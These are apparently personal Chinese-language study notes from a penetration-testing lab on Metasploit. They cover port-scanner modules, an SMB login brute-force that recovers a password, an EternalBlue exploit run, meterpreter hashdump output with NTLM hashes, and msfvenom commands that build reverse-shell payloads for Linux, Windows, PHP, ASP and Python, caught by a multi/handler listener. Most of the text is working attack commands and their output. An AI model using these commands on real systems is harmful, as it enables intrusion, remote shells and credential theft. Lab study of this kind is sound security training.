search
search type:auxiliary telnet

info

RHOSTS 远程主机

还可以用文件
Pasted%20image%2020240229083134

LHOSTS本地IP
LPORT 反向shell连接的端口

setg就是全局set

background进入后台
或者Ctrl + z

sessions查看现有会话
sessions -i 1切换会话

扫描

search portscan

0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator

use scanner/smb/smb_login
set RHOSTS 10.10.131.175
set username jenny
set pass_file /tmp/aaaaa
run

得到 Success: '.\jenny:95'
密码是95
额抱歉,用户是penny

leo1234

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.32.117
RHOSTS => 10.10.32.117
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.17.6.173
lhost => 10.17.6.173
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

还得set payload

永恒之蓝

search -f flag.txt

hashdump转储hash

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::

可以拿去hashes破解

生成有效负载

msfvemon

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Linux 可执行和可链接格式 (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

然后把生成的负载传送到目标机器

在攻击机运行

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 10.17.6.173
set lport 9999
run


run post/linux/gather/hashdump